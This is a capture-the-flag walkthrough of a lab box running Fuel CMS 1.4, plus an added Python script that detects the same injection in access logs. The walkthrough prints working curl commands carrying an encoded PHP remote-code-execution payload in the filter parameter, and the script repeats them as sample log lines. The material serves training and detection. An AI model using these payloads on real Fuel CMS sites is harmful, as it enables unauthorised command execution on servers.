Vulnerability Capstone Walk-through

JAY BHATT
2 min read, Nov 4, 2021

Let's boot up the machine.

Vulnerability Capstone IP

Now let's start an Nmap scan.

Nmap Scan

The Nmap scan shows that ports 22 and 80 are open, so let's visit the website running on port 80.

FUEL CMS

Visiting the website shows that it runs Fuel CMS (a content management system) and displays its version number, so let's search exploit-db for an available exploit for Fuel CMS 1.4.

Fuel CMS 1.4 RCE exploit
RCE payload

The main thing we need is the payload above. Let's craft a payload that runs the whoami command using the available exploit:

curl -g -s "10.10.188.18/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27whoami%27%29%2b%27" | sed -n '47,500p' | tr ">" "\n" | grep -vE "<p|</p|h4|<div|br|</div" | awk NF | tail -n 60 | sed 's/^system$/ /g' | sort -u
The Result

To get the flag we need to replace whoami with a different command, URL-encoded. We can use the CyberChef website to URL-encode the command.

Let's list the contents of the /home/ubuntu directory.

Command: ls /home/ubuntu

URL encoded: ls%20/home/ubuntu

URL encoded

Replace whoami with ls%20/home/ubuntu:

curl -g -s "10.10.188.18/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27ls%20/home/ubuntu%27%29%2b%27" | sed -n '47,500p' | tr ">" "\n" | grep -vE "<p|</p|h4|<div|br|</div" | awk NF | tail -n 60 | sed 's/^system$/ /g' | sort -u
flag location

With the same steps, cat the flag file to read its contents.
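From the defender's side, the same payload that the walkthrough sends is easy to spot in web-server access logs once the filter parameter is URL-decoded: a search filter that should be a plain string instead contains PHP call syntax (pi(, print(, a variable assigned the string 'system' and then called). The script below is an added example, not part of the original post, that parses constructed Apache-style log lines (the IPs, timestamps and sizes are made up; the request paths reuse the walkthrough's encoded filter values), decodes the filter= value and reports the command the attacker tried to run.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access log (Apache combined-style). Lines 1 and 3 carry
# the walkthrough's encoded filter= payloads; lines 2 and 4 are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Nov/2021:10:00:01 +0000] "GET /fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27whoami%27%29%2b%27 HTTP/1.1" 200 1532
10.0.0.6 - - [04/Nov/2021:10:00:02 +0000] "GET /fuel/pages/select/?filter=about HTTP/1.1" 200 812
10.0.0.5 - - [04/Nov/2021:10:00:03 +0000] "GET /fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27ls%20/home/ubuntu%27%29%2b%27 HTTP/1.1" 200 1601
10.0.0.7 - - [04/Nov/2021:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 4021
"""

# Minimal parser for the request part of a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# PHP call syntax has no business in a page-search filter value.
INJECTION_RE = re.compile(
    r"(pi\s*\(|print\s*\(|\$\w+\s*=\s*'system'|system\s*\()", re.IGNORECASE
)


def decode_filter(target):
    """Return the fully URL-decoded filter= value of a request target, or None."""
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get("filter")
    if not values:
        return None
    # parse_qs decodes once; decoding again catches double-encoded payloads.
    return unquote(values[0])


def extract_command(decoded):
    """Pull the string passed to the $var('...') call, if the payload has one."""
    m = re.search(r"\$\w+\('([^']*)'\)", decoded)
    return m.group(1) if m else None


def scan_log(text):
    """Return one finding per request whose filter= value looks like code injection."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        decoded = decode_filter(m.group("target"))
        if decoded is None or not INJECTION_RE.search(decoded):
            continue
        findings.append({
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "status": int(m.group("status")),
            "decoded_filter": decoded,
            "command": extract_command(decoded),
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} command={f['command']!r}")
```

Matching on the decoded value rather than the raw query string matters: the attacker controls the encoding, so a rule that looks for the literal string "system" in the raw URL misses the hex-encoded form the walkthrough uses, while decoding first normalises both.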

Thank you so much for reading, Happy hacking, and happy learning!!


JAY BHATT

Cyber Security Enthusiast |Top 1% on TryHackMe |CTF Player